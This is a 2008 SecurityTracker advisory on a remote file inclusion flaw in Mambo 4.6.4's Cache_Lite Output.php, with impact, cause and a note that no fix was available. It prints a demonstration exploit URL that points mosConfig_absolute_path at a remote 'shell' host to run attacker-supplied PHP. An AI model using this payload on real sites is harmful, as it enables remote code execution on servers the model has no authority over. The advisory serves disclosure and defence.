Mambo Include File Bug in Cache_Lite Class Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1020295
|
|
SecurityTracker URL: http://securitytracker.com/id?1020295
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 16 2008
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 4.6.4 and prior versions
|
Description: A vulnerability was reported in Mambo. A remote user can include and execute arbitrary code on the target system.
The 'output.php' script in the Cache_Lite class does not properly validate user-supplied input. A remote user can supply a specially
crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including
operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[path]/includes/Cache/Li
te/Output.php?mosConfig_absolute_path=http://shell?
The original advisory is available at:
http://milw0rm.com/exploits/5808
irk4z
at yahoo.pl reported this vulnerability.
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: mambo-foundation.org/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 16 Jun 2008 09:15:06 -0400
Subject: Mambo
|
http://milw0rm.com/exploits/5808
|
|
